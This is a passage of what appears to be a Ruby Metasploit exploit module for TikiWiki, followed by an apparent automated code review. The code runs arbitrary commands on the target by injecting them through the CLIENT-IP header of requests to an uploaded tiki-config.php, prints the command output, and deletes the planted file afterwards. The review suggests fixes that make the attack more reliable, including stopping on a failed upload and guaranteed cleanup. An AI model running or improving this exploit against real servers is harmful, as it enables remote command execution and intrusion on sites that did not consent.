'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully created temporary file.")
else
print_status("Error creating temporary file.")
end
end
def exe_command(cmd)
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
res = send_request_raw({
'uri' => url_config,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'CLIENT-IP' => "#{cmd};",
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/my_delim/m))
print_status("The server returned : #{res.code} #{res.message} (#{res.headers['Server']})")
cmd_output = res.body.match(/my_delim(.*)/m)
if (cmd_output)
print_status("Command output from the server :")
print("\n" + cmd_output[1] + "\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
def remove_temp_file
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
res = send_request_raw({
'uri' => url_config,
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'CLIENT-IP' => 'rm -f tiki-config.php',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK")
print_status("Successfully remove temporary file.")
else
print_status("Error removing temporary file.")
end
end
end
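Review bot: remove_temp_file in exploit only runs when create_temp_file and exe_command return normally, and exploit proceeds to the command request even when the upload failed, because create_temp_file only prints the outcome; have create_temp_file return whether the upload succeeded, stop when it did not, and put the removal in an `ensure` so the uploaded file is cleaned up on every path. The default `URI` is `"/tikiwiki/"` with a trailing slash while every request appends `"/jhot.php"` or `"/img/wiki/tiki-config.php"`, producing a double slash; the other TikiWiki modules in this commit default to `"/tikiwiki"`, so use that or `datastore['URI'].chomp('/')` at the call sites. `create_temp_file()` and `remove_temp_file()` take no arguments and conventionally drop the parentheses, and the status text `"Successfully remove temporary file."` should read `"Successfully removed temporary file."`. The request blocks in exe_command and remove_temp_file are identical except for the header value, so remove_temp_file could reuse one shared request helper rather than repeating it.
```ruby
def exploit
  return unless create_temp_file
  begin
    exe_command(payload.encoded)
  ensure
    remove_temp_file
  end
end

def create_temp_file
  # … unchanged: url_jhot, scode, data and the POST request …
  uploaded = (res and res.message == "OK")
  print_status(uploaded ? "Successfully created temporary file." : "Error creating temporary file.")
  uploaded
end
```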